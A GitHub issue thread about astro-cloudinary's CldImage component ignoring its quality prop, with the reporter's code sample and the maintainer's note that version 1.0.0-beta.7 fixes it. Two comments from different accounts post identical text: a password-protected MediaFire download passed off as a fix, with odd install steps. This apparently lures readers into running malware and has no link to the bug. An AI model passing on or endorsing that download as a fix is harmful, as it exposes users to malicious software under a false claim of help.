### ISSUE TITLE
CldImage quality prop ignored

### ISSUE THREAD

**Issue by charleskoehl** [colbyfayock/astro-cloudinary#7]
Expected: setting quality={72} should modify the cloudinary url
Actual: url still contains "q_auto"

```
  <CldImage
    src="https://res.cloudinary.com/vacationscostarica-com/image/upload/v1717104875/costa_rica_vacations_travel_agency_a174d3dd47.jpg"
    width={1920}
    height={1080}
    crop="fill"
    quality={72}
    sizes="(max-width: 576px) 50vw, (max-width: 768px) 65vw, (max-width: 992px) 75vw, 100vw"
    alt="beach"
    class="h-full w-full object-cover"
  />
```

src="https://res.cloudinary.com/vacationscostarica-com/image/upload/c_fill,w_1920,h_1080,g_auto/f_auto/q_auto/v1717104875/costa_rica_vacations_travel_agency_a174d3dd47?_a=BBGAABV80"

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by colbyfayock** [comment]
thanks for flagging, i pushed a fix that is now available on `astro-cloudinary@1.0.0-beta.7`

let me know if you have any issues
